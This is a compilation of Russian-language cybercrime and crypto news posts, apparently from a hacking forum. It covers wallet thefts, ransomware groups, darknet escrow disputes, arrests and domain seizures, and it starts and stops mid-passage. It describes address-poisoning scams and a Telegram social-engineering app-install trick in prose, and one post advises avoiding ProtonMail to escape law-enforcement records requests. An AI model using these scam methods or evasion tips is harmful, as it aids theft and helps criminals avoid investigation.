Обе ситуации могут быть связаны друг с другом или даже выполнены одной скам- группой. На это указывает выбранная тактика реализации, совпадения в датах регистраций сервисов, а также ориентированность именно на крупных игроков с серьезными суммами.
Брестский межрайонный отдел Следственного комитета завершил расследование уголовного дела о разработке и сбыте вредоносных программ. Материалы переданы прокурору для направления в суд, сообщает БЕЛТА со ссылкой на официального представителя областного УСК Романа Зармаева.
Разрабатывать программы-брутфорсеры 21-летний брестчанин начал в августе 2020 года. С их помощью подбирал логины и пароли для входа в чужие учетные записи на зарубежных торговых интернет-платформах. "Взломанные аккаунты и вредоносные программы молодой человек продавал пользователям различных зарубежных форумов. Для оказания содействия он привлек своего 22-летнего знакомого, который хорошо владел английским языком и вел переговоры с потенциальными покупателями", - рассказал подробности Роман Зармаев.
Оплату молодые люди получали на различные кошельки в криптовалюте, затем конвертировали и переводили деньги на подконтрольные банковские счета. Таким образом за два года хакеры заработали более Br8,5 тыс.
Молодые люди раскаялись в содеянном и сотрудничали со следствием. Во время следственного эксперимента 21-летний брестчанин показал механизм разработки вредоносной компьютерной программы. Стоит сказать, что оба обвиняемых не имели образования в сфере высоких технологий.
Действия фигурантов квалифицированы по ч.2 ст.354 (разработка, использование, распространение и сбыт вредоносных компьютерных программ) УК. А 21-летнего хакера обвиняют и по ч.1 ст.349 (несанкционированный доступ к компьютерной информации, совершенный из корыстной заинтересованности) УК. Они находятся под подпиской о невыезде и надлежащем поведении.
Вечером субботы, 3 июня, появились первые сообщения о пропаже средств от пользователей кошелька Atomic Wallet. Общая сумма украденных средств уже превысила $14 млн.
По данным криптовалютных аналитиков, первые транзакции, проведенные хакерами, проявились еще в ночь на 3 июня. Затем процесс был поставлен на поток. Неизвестные выводили активы с кошелька конкретного пользователя на новый адрес, затем обменивали все токены через децентрализованные биржи вроде Sushiswap, Uniswap, MM Swaps и другие. После средства выводились на новый адрес.
«У нас есть сообщения о взломе кошельков. Мы делаем все возможное для исследования проблемы и анализа ситуации», ― сообщили разработчики Atomic Wallet.
Криптоисследователь под псевдонимом ZachXBT сообщил, что с кошельков крадут самые разные активы. Хакеры выводили биткоин, эфир, Tron, BSC, ADA, Ripple, Polkadot, Cosmos, Algo, Avax, XLM, LTC и Doge. Аналитик предположил, что урон уже превысил подтвержденные пользователями $14 млн и превышает $20 млн.
Update: The new largest individual loss from this hack was just found at $3.5M (1897 ETH). The five biggest losses have accounted for $9.7M in total. pic.twitter.com/deVhMxvwLl — ZachXBT (@zachxbt) June 4, 2023
Click to expand...
Один из пользователей потерял $3,5 млн (1897 ETH). По данным ZachXBT, пять крупнейших кошельков, с которых хакеры вывели средства, в сумме потеряли $9,7 млн. Единственным способом защиты активов у пользователей Atomic Wallet остается перевод средств на новые адреса, причем созданные с помощью другого ПО.
В даркнете подозревают провокацию со стороны спецслужб.
Гарант Korochka едва не стала фигурантом возможной сделки о теракте в Москве. Об этом стало известно благодаря скриншотам переписки, которые она прислала членам своей команды, после чего те распространились среди членов даркнет- комьюнити.
Из содержания этих изображений следует, что ей предложили стать гарантом сделки по исполнению теракта у Кремля или на Красной площади с обязательным условием наличия 50 погибших за 15 процентов от суммы. Korochka в резкой форме отказалась.
«Я вообще изначально подумала, что это чья-то провокация или рофл, — сказала Korochka в ходе обсуждения ситуации с рамках конференции в Telegram. — Мне сказали, что в сделке будут принимать участие пять гарантов — Офелия, Pikachu, Лука Киргиз, я, а еще одного гаранта нужно найти. Мне задали вопрос о том, кого я могу посоветовать. Я ответила, что понятия не имею, про какого гаранта у меня спрашивают. Я не поняла, что это серьезно может быть. Вы же понимаете, что это треш?»
Korochka отметила, что не знает, какие договоренности у ее собеседника были с другими перечисленными гарант-сервисами. Также она не в курсе того, как развивалась ситуация в дальнейшем. Однако на фоне сообщений о том, что один из этих гарантов — Pikachu — проходит сейчас по делу о причастности к терроризму, отдельные представители даркнет-сообщества предположили, что речь может идти о спланированной провокации российских спецслужб. Ее целью может быть вывод из тени и деанонимизация крупных гарант-сервисов с предъявлением им обвинений по наиболее тяжким статьям уголовного кодекса.
«Сделки как таковой не было. Я ее не создавала, меня просто добавили в какую- то группу, где находился этот человек. Я подумала, что кто-то специально меня провоцирует: мне предложили убийство, какой гарант сможет промолчать об этом?» — заключила Korochka.
В русскоязычных Telegram-каналах даркнет-тематики развивается противостояние между Лукой Киргизом и Nihao. Последний обвинил «смотрящего за киберпреступным миром» в скаме на 33 тысячи долларов.
Конфликт начался после переписки в чате MIDAS, когда Nihao откликнулся на просьбу залить на кредитку 31 тысячу долларов. После приватной переписки с Лукой Киргизом Nihao попросил привлечь к сделке гаранта, на что, по словам его визави, ответил, что у него «нет денег».
«Потом сказал, что у него есть тысяча долларов в крипте, и ими он готов ответить. Я спросил, должен ли я залить ему три тысячи. Он написал, что хочет проверить, как я работаю. Потом написал, что можно начинать сделку и скинул реквизиты и скрин карточки с долгом в 31 тысячу», — рассказал Nihao в беседе.
Однако после отправки средств Лука возмутился, не поняв, зачем ему эти три тысячи долларов. Как он уточнил позднее в одном из своих сообщений, Nihao «показал полную некомпетентность в работе», который «как [лжец] нарисовал отказ от гаранта», а после «без отмашки [направил] три тысячи долларов, не сказав, что они отлетели».
По версии Nihao, «позже лог сдох», ему «дали отмашку, мол, умерло, не придет, возможно». После этого Nihao залил уже 30 тысяч долларов, которые успешно ушли. Однако вечером следующего дня, 16 июня, когда заказчик решил уточнить, дошла ли сумма, Лука написал ему, что ничего не пришло, лишь позднее предоставив обрезанный скрин с уже другой задолженностью по карте и скрытыми операциями по счету. Судя по перепискам, вменяемого ответа на просьбу предоставить нормальный скриншот Nihao не получил никакой конкретики. Спустя еще сутки переписка была опубликована с обвинениями Луки в скаме, после чего конфликт перерос в публичную плоскость.
«Спустя три дня, когда подняли старших Луки и других типов, сразу появился скрин, из которого следует, что бабки реально отобразились 16 июня, хотя они это отрицали», — констатировал Nihao.
В ходе конфронтации Nihao также уточнил у Луки, не забыл ли тот, «как лицом в снег лежал». Позднее Киргиз заявил о готовности деанонимизировать Nihao, а ему самому в личку написал пользователь, который сообщил, что ему поступил заказ на деанон за 500 долларов. Вскоре после этого Лука намекнул, что может не провести выплату из-за резкой позиции контрагента. На момент публикации материала конфликт не был улажен сторонами.
I was reading the indictment about the famous coin mixer called ChipMixer which was recently taken down by FBI and DOJ. In the whole court document, they specify how they tracked the administrator of the ChipMixer.
You can read the whole court document **[here](https://tortimes.com/images/posts/one-of-the-biggest-crypto-mixers- chipmixer-seized-by-german-police/court.pdf). **On the page 27, it states that
** "An international records request for the chipmixer@protonmail.com account revealed there were two accounts linked to the email address chipmixer@protonmail.com"**
Click to expand...
Another mention of protonmail helping feds is on the page 37, it states that:
Further, PayPal transaction logs related to the accounts listed in the table above revealed there were transactions with approximately 70 different users with ProtonMail accounts.
The FBI submitted international records requests for subscriber data for these ProtonMail accounts.Click to expand...
They were able to ask for the recovery email and other sensitive data. My last note would be:
PLEASE DO NOT USE PROTONMAIL!
__https://twitter.com/x/status/1459260427339243523
Новости об аресте Дениса Дубникова появились после того, как на этой неделе Bloomberg сообщил, что его Eggchange является целью расследований по борьбе с отмыванием денег в Европе и США. В сентябре Министерство финансов США приняло санкции против зарегистрированного в Чехии внебиржевого криптоброкера Suex, который работает вне офисов в Москве и Санкт-Петербурге.
Дубников - не первый российский криптопредприниматель, задержанный на основании ордера США. Летом 2017 года российский айтишник Александр Винник был задержан в греческом городе Салоники, куда приехал на отдых с семьей. Американская прокуратура утверждает, что Винник, предполагаемый оператор печально известной биржи BTC-e, отмыл до 9 миллиардов долларов через ныне несуществующую платформу для торговли монетами. С тех пор он был экстрадирован во Францию и приговорен к пяти годам тюремного заключения за отмывание денег. В мае французские судебные органы отклонили запрос о его экстрадиции в Россию, где ему также будут предъявлены обвинения.

Report Mentions FBI – Bitcoin News - Todayuknews ](https://todayuknews.com/crypto-currency/moscow-confirms-arrest-of-russian- crypto-entrepreneur-in-amsterdam-report-mentions-fbi-bitcoin-news/)
Authorities in the Netherlands have arrested a Russian national with a cryptocurrency business, the Foreign Ministry in Moscow has confirmed. The man involved
 todayuknews.com
48 стран заявили об ужесточении мер против программ-вымогаталей.
США вместе с группой из 48 стран, Европейским союзом и Интерполом в рамках международной инициативы противодействия программам-вымогателям (International Counter Ransomware Initiative, CRI) заявили об отказе от уплаты выкупов в случае кибератак. Главной целью инициативы является прекращение финансирования вымогателей.
Кроме того, группа обсудила новые подходы к борьбе с киберпреступностью, включая использование искусственного интеллекта и анализа блокчейн-данных, а также создание специализированной платформы для обмена информацией между странами-участниками.
Был достигнут прогресс в разработке совместной политики, которая включает в себя обмен списками заблокированных криптовалютных кошельков, связанных с атаками программ-вымогателей. Несмотря на сложности в координации международных усилий и противоречивые мнения о запрете на выплаты выкупов, участники согласились считать такие выплаты недопустимыми, что стало значительным шагом в борьбе против распространения киберпреступности.
Согласно отчетам, количество атак программ-вымогателей растет, и инциденты такого рода увеличились на 153% по сравнению с прошлым годом. В ответ на это международные правоохранительные органы активизировали сотрудничество, что уже привело к успешной ликвидации крупных хакерских группировок и киберпреступных сервисов, в том числе известной группы вымогателей Hive и даркнет-рынка Genesis .
С целью разработки запрета на уплату выкупа участники инициативы будут искать способы привлечения других стран к ответственности за их роль в игнорировании правил или содействии вымогателям. Страны-участницы также будут делиться информацией и предпринимать действия против кампаний с использованием программ-вымогателей на своих территориях.
SOURCE: reuters.com/technology/alliance-40-countries-vow-not-pay-ransom- cybercriminals-us-says-2023-10-31/
Вымогательская группировка BlackCat (ALPHV) заявила, что правоохранительные органы захватили ее сайт и инфраструктуру. Однако партнеры группы и ИБ- специалисты считают, что это exit scam, то есть хакеры попросту пытаются скрыться с деньгами, а правоохранители не имеют никакого отношения к происходящему.
В конце прошлой недели ИБ-специалисты заметили, что BlackCat отключила свои
серверы (прекратил работу блог группы, а также сайты для переговоров с
жертвами), а партнеры группировки обвинили создателей BlackCat в хищении 22
млн долларов. Тогда статус хакеров в Tox гласил, что «все выключено» и
решается, но потом сменился на другой статус — «GG».

При этом 1 марта 2024 года специалист компании Recorded Future Дмитрий
Смилянец поделился интересным скриншотом: один из партнеров BlackCat под ником
notchy утверждал, что это он стоит за недавней громкой атакой на компанию
Optum. И якобы оператор платформы Change Healthcare недавно выплатил ему выкуп
в размере 22 млн долларов США за расшифровку данных.

В данном случае notchy обвинил BlackCat в том, что после получения выкупа от Optum его обманули. Он пишет, что после получения денег, BlackCat заблокировала его партнерский аккаунт и забрала все средства из кошелька. Notchy заявляет, что у него на руках остались 4 ТБ «критически важных данных Optum», включая «производственную информацию, которая затрагивает всех клиентов Change Healthcare и Optum». По его словам, он располагает данными «десятков страховых компаний» и поставщиков широкого спектра услуг, связанных со здравоохранением, расчетно-кассовым обслуживанием, аптеками и так далее.
Напомним, что недавно взломанная Optum, это дочерняя компания UnitedHealth Group, которая глубоко интегрирована с системой здравоохранения США и работает с электронными медицинскими картами, обработкой платежей, анализом данных в больницах, клиниках и аптеках. Как мы уже сообщали ранее, атаку на Optum [связывают](https://www.reuters.com/technology/unitedhealth-confirms-blackcat- group-behind-recent-cyber-security-attack-2024-02-29/) с BlackCat.
В доказательство своих слов notchy приложил к сообщению криптовалютный адрес с девятью транзакциями: первоначальным входящим переводом в 350 биткоинов (около 23 млн долларов США) и восемью исходящими. Причем адрес, с которого пришли биткоины, содержит всего две транзакции: одна — получение 350 биткоинов, другая — отправка их на кошелек, связанный с BlackCat.
Когда СМИ связались с представителями UnitedHealth Group и спросили их о
возможной выплате выкупа, в компании отказались от комментариев и заявили, что
в настоящее время полностью «сосредоточены на расследовании».
Как теперь пишет издание Bleeping Computer, и предполагают ИБ-специалисты,
происходящее очень похоже на exit scam, то есть, создатели BlackCat пытаются
скрыться с деньгами.
Так, на одном из форумов появилось заявление группировки, в котором сообщается, что BlackCat решила закрыть проект «из-за федералов», но при этом хакеры не предоставили никаких дополнительных объяснений.
Вместе с этим статус группировки в Tox сменился на объявление о продаже
исходных кодов малвари на 5 млн долларов США.

Затем на сайте BlackCat о вовсе появилась «заглушка», сообщающая, что ресурс
захвачен и конфискован ФБР, Минюстом США, Национальным агентством по борьбе с
преступностью Великобритании (NCA) и так далее.

Однако, как отмечают журналисты и известный ИБ-специалист Фабиан Восар (Fabian
Wosar), «заглушка» выглядит подозрительно и, судя по всему, является
фальшивкой. Так, картинка находится в папке с именем «/THIS WEBSITE HAS BEEN
SEIZED_files/». По словам Восара, хакеры просто установили Python
SimpleHTTPServer
для отображения на
сайте старой фейковой «заглушки».
«Они просто сохранили уведомление со старого сайта для утечек и запустили Python HTTP-сервер, чтобы отображать его на новом сайте. Лентяи», — говорит Восар.
Click to expand...
Также исследователь отметил, что его контакты в Европоле и NCA сообщают, что власти не имеют никакого отношения к новому захвату сайта BlackCat.
Дело в том, что в декабре 2023 года правоохранительные органы действительно скомпрометировали инфраструктуру BlackCat и даже выпустили инструмент для расшифровки данных. Судя по всему, картинку с уведомлением о конфискации ресурса хакеры взяли именно оттуда. Ведь тогда вымогательская группировка продолжила работу, пообещав нанести ответный удар по правительству США и атаковать критическую инфраструктуру страны.
Всего за два месяца во всем мире потеряли работу свыше 50 тыс. ИТ- специалистов. Сотни ИТ-компаний сокращают свой штат и пока не спешат нанимать новый персонал. Эксперты называют происходящее «кровавой резней» и с ужасом вспоминают, что подобное уже происходило четверть века назад, когда массово начали закрываться интернет-стартапы (доткомы). Хотя даже тогда работы лишилось значительно меньше людей.
Выжить в ИТ непросто
В мировой сфере информационных технологий идут массовые увольнения. Как пишет TechSpot со ссылкой на статистику портала Layoffs.fyi (отслеживает количество лишившихся работы во всем мире и во многих сферах деятельности), всего лишь за январь и февраль 2024 г. без работы остались свыше 50,3 тыс. специалистов в ИТ – именно столько людей выставили за дверь 209 технологических компаний. Ситуация, очевидно, лучше не становится – CNews писал, что в октябре 2022 г. сокращение настигло 9600 ИТ-специалистов.
Если же посмотреть на результаты за весь 2023 г., то 1191 почти ИТ-компаний сократили в пределах 269,2 тыс. работников. По данным TechSpot, все дело в стремлении этих фирм сократить свои операционные расходы, к которым относятся зарплата и прочие выплаты персоналу. ИТ-компании стремятся подстроиться под нынешние реалии рынка, к которым относится и начавшаяся в 2022 г. стагнация мировой экономики, и раздутый штат, в который принимали всех ИТ-шников в ковидный 2020 г., им больше не требуется.
«Кровавая резня»
Что немаловажно, людей увольняют не только крошечные ИТ-стартапы, которым стало очень сложно выплачивать зарплату вовремя и в полном объеме. Наоборот, свой пример небольшим компаниям подают крупнейшие ИТ-гиганты – как сообщал CNews, Alphabet (Google, YouTube и пр.), Amazon, Cisco, eBay, Microsoft, SAP и пр. – с конца 2022 г. они сообща уволили приблизительно 100 тыс. человек.
В некоторых случаях компании сокращают свой штат радикально – известная платежная система PayPal в январе 2024 г. вознамерилась уволить 2500 человек, а это около 9% ее персонала.
По данным исследовательской компании Challenger, Gray & Christmas, начавшаяся в мировой ИТ-сфере «кровавая резня» (carnage) настолько велика, что она уступает по своим масштабам только лишь массовым увольнениям в ИТ-отрасли, случившимся в начале XXI века.
Тогда лопнул так называемый «пузырь доткомов» (Dotcom, «точка com»; – прим. CNews), обернувшийся еще более большой волной увольнений в ИТ-сфере. Речь в данном случае о небывалом массовом крахе интернет-компаний, которые в те годы именовались «доткомами». Ему предшествовал стремительный рост их акций, цена которых обвалилась в одночасье 10 марта 2000 г.
По подсчетам исследователей Challenger, Gray & Christmas, в 2001 г. в технологической отрасли было сокращено около 168,4 тыс. рабочих мест, а годом позже – почти 131,3 тыс. как видно, нынешняя ситуация в индустрии значительно хуже, чем была 24 года назад.
Что касается современных тенденций, то в отчете Challenger, Gray & Christmas сказано, что в феврале 2023 г. было уволено около 63,2 тыс. ИТ-специалистов. Годом позже этот показатель сократился на 55%.
Увольнение как дорога к новому
Нынешние массовые увольнения вполне могут сыграть злую шутку с ИТ-компаниями, когда им снова потребуется новый персонал. Cогласно серии интервью CNBC, в этой ситуации многие ИТ-специалисты уверены, что поиск работы их сфере связан с высокой конкуренцией на фоне большого количества лишившихся работы людей.
Основатель сервиса Layoffs.fyi Роджер Ли (Roger Lee), считает, что многие из этих работников в результате полностью уходят из сферы технологий. Ситуацию усугубляет и проблема с заработными платами в мировой ИТ-сфере. CNews писал, что в в России водителям и курьерам сейчас платят больше, чем ИТ-шникам.
Судя по всему, схожая ситуация разворачивается и за пределами России. По словам Роджера Ли, некогда безудержного повышения зарплат в мировой ИТ-сфере больше нет – зарплаты в сфере технических наук «в значительной степени стагнировали» за последние два года.
Ничего не изменится
Причиной массовых увольнений сами ИТ-компании называют необходимость сократить штат после наплыва сотрудников во время пандемии, инфляцию и слабый потребительский спрос. В 2023 г и начале 2024 г. мировая инфляция заметно снизилась по сравнению с показателями 2022 г., и многие их этих фирм вышли на прибыль.
Однако снижать темпы сокращений они, по всей видимости, не собираются. Как отметил профессор Школы бизнеса Фостера Вашингтонского университета Джефф Шульман (Jeff Shulman), увольнения в 2024 г. можно объяснить тремя словами – цены на акции. «Оздоровление» штата поддерживает стоимость акций на нужном фирмам уровне, «поэтому эти компании не видят причин останавливаться», добавил Шульман, назвав происходящее новой нормой. «Им это (массовые увольнения – прим. CNews) сходит с рук, потому что все они это делают. Работники постепенно привыкают к этому, инвесторы довольны, и поэтому я думаю, это будет продолжаться еще какое-то время», – подытожил профессор.
Правоохранительные органы Багамских Островов арестовали основателя FTX Сэма Бэкнмана-Фрида по запросу правительства США. Об этом сообщил прокурор Южного округа Нью-Йорка Дэмиан Уильямс.
USA Damian Williams: Earlier this evening, Bahamian authorities arrested Samuel Bankman-Fried at the request of the U.S. Government, based on a sealed indictment filed by the SDNY. We expect to move to unseal the indictment in the morning and will have more to say at that time.
— US Attorney SDNY (@SDNYnews) December 12, 2022Click to expand...
«Власти Багамских Островов арестовали Сэмюеля Бэнкмана-Фрида по запросу правительства США на основании опечатанного обвинительного заключения, зарегистрированного в Южном округе Нью-Йорка. Мы ожидаем, что утром будет подано ходатайство о снятии секретности с обвинительного заключения, после чего мы сможем сообщить больше подробностей», — говорится в сообщении.
Click to expand...
Согласно заявлению прокурора Багамских Островов Райана Пиндера, арест произошел 12 декабря. США выдвинули против основателя FTX уголовные обвинения. Ожидается, что американские правоохранительные органы потребуют экстрадировать Бэнкмана-Фрида в Штаты.
BREAKING: Attorney General Ryan Pinder said former FTX CEO Sam Bankman-Fried was arrested. pic.twitter.com/DO37NA3Q7E
— Jasper Williams-Ward (@jasperward94) December 12, 2022Click to expand...
«В случае подачи официального запроса на экстрадицию Багамские Острова намерены оперативно рассмотреть ходатайство в соответствии с местным законодательством и договорными обязательствами с США», — сказано в пресс- релизе.
Click to expand...
Премьер-министр Багамских Островов Филип Дэвис добавил, что, несмотря на инициативу правоохранительных органов США, власти страны продолжат расследовать коллапс FTX.
По словам источников The New York Times, предъявленные Бэкнману-Фриду обвинения включают мошенничество с использованием электронных средств связи, сговор с целью мошенничества с ценными бумагами и отмывание денег.
В SEC также сообщили, что отдельно предъявят основателю FTX обвинения, связанные с нарушением законов о ценных бумагах. Их должны публично огласить 14 декабря.
Gurbir Grewal: We commend our law enforcement partners for securing the arrest of Sam Bankman-Fried on federal criminal charges. The SEC has authorized separate charges relating to his violations of securities laws, to be filed publicly tomorrow in SDNY. https://t.co/ON0LgY4mf4
— U.S. Securities and Exchange Commission (@SECGov) December 13, 2022Click to expand...
13 декабря основатель FTX [должен был](https://forklog.com/news/sem-benkman- frid-proignoriroval-vyzov-na-slushaniya-v-senat-ssha) выступить на слушаниях банковского комитета Сената США. По словам главы комитета Максин Уотерс, она разочарована тем, что «не сможет услышать Бэнкмана-Фрида».
«Давно пора начать процесс привлечения Бэнкмана-Фрида к ответственности. […] Однако американская общественность заслуживает услышать непосредственно от [основателя FTX] ответы на вопросы касательно действий, которые нанесли ущерб более чем миллиону человек», — заявила Уотерс.
Click to expand...
Tether заморозил аккаунт мошенника, но не успел спасти средства жертвы.
По данным компании PeckShield, занимающейся аналитикой блокчейна, 1 августа злоумышленник совершил успешную фишинговую атаку через нулевую транзакцию и украл 20 млн. USDT (стейблкоин Tether) прежде, чем его аккаунт был заблокирован Tether.
Жертва мошенничества хотела перевести средства со своего кошелька на другой адрес. Но из-за действий мошенника деньги были перенаправлены на фишинговый адрес, название которого было похоже на адрес получателя.
Похищение средств произошло, когда на кошелек жертвы поступило 10 млн. USDT от аккаунта на Binance. После перевода средств мошенник осуществил атаку через нулевую транзакцию – он отправил нулевое количество USDT с аккаунта жертвы на фишинговый адрес. В итоге, жертва, полагая, что переводит деньги на знакомый адрес, ошибочно отправила 20 млн. настоящих USDT мошеннику.
Tether заморозила кошелек злоумышленника в течение часа – сразу после того, как была обнаружена мошенническая активность. Такая скорость реакции на инцидент вызвала удивление в криптосообществе.
Важно отметить, что основная опасность фишинговых атак через нулевые транзакции заключается в том, что пользователи часто проверяют только первые или последние цифры адреса кошелька, не просматривая его полностью.
Такая неосторожность приводит к тому, что пользователи не замечают подмену и отправляют активы на фишинговые адреса. Мошенники, в свою очередь, создают адреса, которые внешне почти не отличаются от тех, что использовались жертвами ранее. Если пользователь уже отправлял монеты на определенный адрес для депозита на бирже, мошенник может направить с кошелька пользователя 0 монет на фишинговый кошелек с похожим адресом.
Часто пользователи принимают такую транзакцию за правильный адрес для депозита и отправляют на него свои средства. Популярность такого типа мошенничества заметно выросла за последний год. Первый известный случай произошел в декабре прошлого года и привел к ущербу более $40 млн.
Для предотвращения подобных инцидентов необходимо всегда внимательно проверять полный адрес кошелька, а не только его первые и последние цифры. Помимо этого, пользователи могут внедрить дополнительные меры безопасности, такие как двухфакторная аутентификация (2FA) и использование аппаратных кошельков.
Обвиняемый
в киберпреступлениях гражданин Украины Васинский предстал перед судом в
Техасе. По данным гособвинения США, он вместе с подельниками в составе
организации REvil внедрял вредоносное ПО в компьютерные сети. Васинского
арестовали в Польше в октябре 2021 года.
"Если его признают виновным по всем пунктам, ему грозит в общей сложности 115 лет лишения свободы" - говорится ( https://www.justice[.]gov/opa/pr/so...-extradited-united-states-and-arraigned- texas ) на сайте ведомства
думал поживут еще, но нет
Прокуратура Софии объявила о задержании на 72 часа 21-летнего Теодора Ил., скрывавшегося под ником Emil Kyulev. По данным следователей, он причастен к многочисленным взломам и краже данных банков и страховых компаний страны.
Свои преступления Теодор совершал с марта 2020 года по январь 2024-го. В последний раз он громко заявил о себе в публичном пространстве в июле минувшего года, заявив о взломе баз страховщиков из «Лев Инс». Тогда он похвастался, что раздобыл записи, компрометирующие создателя компании Алексея Петрова, который месяц спустя был убит.
В начале 2022 года пользователь XSS с ником Kyulev пытался продать дамп компании Sirma Holding's ICS, услугами которой пользуются практически все страховые брокеры Болгарии. За массив данных он затребовал 15 тысяч евро, в ходе диалога с другими пользователями подтвердив, что он — Emil Kyulev, а также оставив в теме предполагаемые номера телефонов премьер-министра и министра экономики Болгарии.
bnr.bg/en/post/102013553/police-detains-hacker-emil-kyulev-who-broke-the-
database-of-state-institutions-banks-and-legal-entities
xss.is/threads/60755
Министерство юстиции США и ФБР заблокировали доступ к крупнейшей теневой онлайн-библиотеке научной литературы Z-Library. Владельцы пиратского портала потеряли контроль над сотней доменных имен. Студенты и преподаватели постят в соцсетях яростные комментарии, сравнивая происходящее с поджогом Александрийской библиотеки.
Библиотеку на абордаж
Одно из самых крупных онлайн-хранилищ научной, технической и научно-популярной литературы Z-Library потеряло контроль над своими доменными именами, пишет портал TorrentFreak. Министерство юстиции и США захватили около 140 доменов библиотеки – это подтверждают баннеры, которые видят пользователи, кликая на сайты. Среди них z-lib.org, book4you.org, u1lib.org, bookmail.org, b-ok.org, b-ok.cc , booksc.xyz, bookos-z1.org , vn1lib.club, zlibcdn.com , usa1lib.org и другие.
Многие из них представляли собой резервные копии главного сайта Z-Library или «зеркала». Среди заблокированных ресурсов оказался и Gloe.org – «Глобальная электронная библиотека» – портал, который библиотеки и книжные магазины могли использовать для оцифровки своих книг.
«Этот домен был изъят Федеральным бюро расследований в соответствии с ордером, выданным в соответствии с 18 U.S.C. §981 (b) и 21 U.S.C. § 853 (f) Окружным судом Соединенных Штатов по Восточному округу Нью-Йорка», – сообщает надпись на баннерах заблокированных ресурсов.
Первая статья предусматривает конфискацию имущества, которое было использовано для совершения преступления (или доходы от его реализации были использованы в этих целях). Вторая разрешает арест имущества, подлежащего конфискации (видимо, речь идет о доменном имени и контенте, который размещен по ссылке).
Так или иначе, судя по баннерам, в отношении владельцев сайтов, связанных с Z-Library ведется уголовное расследование.
Что известно про Z-Library
Z-Library – крупнейшее хранилище пиратских книг в интернете с миллионами постоянных посетителей. На сайте размещены около 12 млн оцифрованных книг, которые может скачивать каждый желающий. По данным Европейской комиссии, библиотека управляется из Китая. Создатели проекта утверждают, что сервера архива размещены в США, Панаме, России, Германии, Финляндии, Малайзии и Люксембурге, а общий размер данных составляет около 160 терабайт.
Библиотека развивала систему поощрения зарегистрированных пользователей – при создании аккаунта они получали доступ к конвертеру электронных книг и возможность оставлять отзывы и расширенный лимит ежедневных скачиваний. Сайт финансировался через сбор пожертвований, рекламу и покупку «подарочных карт».
Ресурс по понятным причинам критиковали Гильдия авторов и Ассоциация американских издателей, называя его «печально известным пиратским сайтом», который мешает работе «белых» площадок. В 2018 г. сайт B-ok.org, который относится к Z-Library, вошел в список распространителей контрафакта и пиратского контента, составленный Еврокомиссией. Вместе с Z-library в список вошли российские порталы Library Genesis и Sci-Hub.
Реакция соцсетей
В Twitter полно возмущенных комментариев – в основном, их оставляют студенты и преподаватели, которые часто обращались к ресурсам Z-library, чтобы скачать бесплатно книги и научные статьи. Студенты жалуются, что каждый учебник обходится в сумму от $80 до $100, и с каждым годом на учебную литературу уходит все больше денег. Некоторые сравнили блокировку Z-library с поджогом библиотеки в Александрии.
Среди российских пользователей также оказалось немало огорченных блокировкой. Некоторые уточнили, что ряд порталов работали с перебоями уже пару лет.
«То сервер недоступен, то не удается открыть страницу. То заблокирован провайдером», – пишет в Facebook россиянин.
«Z-library позволял скачивать до 10 изданий в сутки бесплатно при регистрации (5 – без). Больше по подписке. Книг – море, и в различных форматах (можно было конвертировать там же). Зачастую, там были более свежие издания, чем на Amazon. Узнать бы, когда и где они всплывут», – сетует еще один.
Есть ли у Z-library шанс
В то же время, не все известные домены Z-Library пока отключены, доступны сейчас те домены, что зарегистрированы через финскую компанию Sarek Oy – ‘singlelogin.me ’ и booksc.me. Так или иначе, библиотека пока не уничтожена полностью – домен .onion также остается работоспособным и доступен через сеть Tor. Сама Z-Library также не подтвердила изъятие доменных имен – на сайте Tor есть лишь уведомление о «проблемах с серверами».
«Общие домены Z-library в настоящее время недоступны из-за блокировки сервера одним из наших хостинг-провайдеров. Мы делаем все возможное, чтобы вернуться к работе как можно скорее», – уточнили в библиотеке.
Получат ли пользователи снова доступ к нелегальному научному контенту, в беседе с CNews объяснил владелец компании «Интернет-розыск» Игорь Бедеров.
«Правительство США сделало то же самое, что делает Роскомнадзор – разделегировало владение доменными именами, которыми владела библиотека, – отметил эксперт. – При этом никакого сообщения об изъятии серверов или об их обнаружении не было. То есть библиотека сейчас имеет все возможности зарегистрировать новые доменные имена и продолжить свое функционирование».
Бедеров добавил, что сам массив данных не был не уничтожен – только внешние системы доступа, веб-интерфейсы в виде сайтов, через которые осуществлялся доступ к библиотеке. Сам массив данных находится в отдельном хранилище, которое правительству США еще необходимо будет как-то обнаружить. Скорее всего, библиотеку удастся восстановить.
Сообщение от модератора: речи ни о какой уязвимости в ТГ здесь конечно не идет, а о СИ-методе прогруза через переход на "внешний плеер". Пояснение здесьиздесь.
В ТГ дырень. Вновь.
Связана с загрузкой видосов (видос с демонстрацией не дает форум прикрепить)
Требует дополнительны действий от пользователя и похоже на си.
Результат -- установленная апка на смартфоне.
Вновь в популярном мессенджере Telegram была обнаружена критическая уязвимость, связанная с загрузкой видеофайлов. Эта уязвимость требует дополнительных действий от пользователя и напоминает атаку, основанную на Соц.Инж-е.
Сообщается, что злоумышленники могут использовать данный эксплойт для установки вредоносного приложения на смартфон жертвы. Для этого пользователю необходимо загрузить видеофайл, который содержит вредоносный запрос. Из видоса-источника не ясно что там, похоже на то что эмулируется модальное окно. По тапу происходит установка "дополнительно плеера", видимо.
Эта уязвимость представляет серьезную угрозу безопасности, так как может привести к несанкционированной установке приложений на устройствах пользователей, что, в свою очередь, может привести к краже личных данных, денежных средств и другой конфиденциальной информации.
Пользователям рекомендуется проявлять осторожность при загрузке и воспроизведении видеофайлов, полученных из непроверенных источников. Также стоит обновить мессенджер до последней версии и установить антивирусное программное обеспечение, которое может помочь в обнаружении и блокировке подобных угроз.
На данный момент официальные представители Telegram не предоставили комментариев относительно данной уязвимости. Ожидается, что в ближайшее время будет выпущено обновление, устраняющее эту проблему.
Эта ситуация подчеркивает важность регулярного обновления приложений и осторожного обращения с получаемыми файлами, чтобы защитить свои устройства и данные от возможных угроз.
Zservers подверглись атаке и предоставляют дерьмовую поддержку клиентов... У
кого-нибудь есть больше информации?
Продажа данных о краденных кредитных картах, вредоносное программное обеспечение для различных хакерских атак, такие как программа-вымогатель (ransomware), проникновение в информационные системы и кража баз данных. В такой незаконной деятельности подозревается 43-летний Сергей Гусев, гражданин России, который стал португальцем, житель Гайи, которому Инструкционный суд Порту назначил арест. Совместное расследование ФБР и Уголовной полиции показало, что он продавал данные кредитных карт тысяч людей, большинство из которых португальцы.
Источник, связанный с процессом, рассказал, что о действиях сообщило ФБР, согласно которым подозреваемый администрировал форум под названием Verified Forum (VF), имевший также доступ как к Видимой Сети, так и к Даркнету, в который можно войти через браузер TOR, обычно используемый преступниками. Форум использовался для размещения украденных данных, которые затем использовались для мошеннических действий. Агент ФБР сопровождал обыски, проведённые в мае Уголовной полицией в доме подозреваемого.
У него был пароль
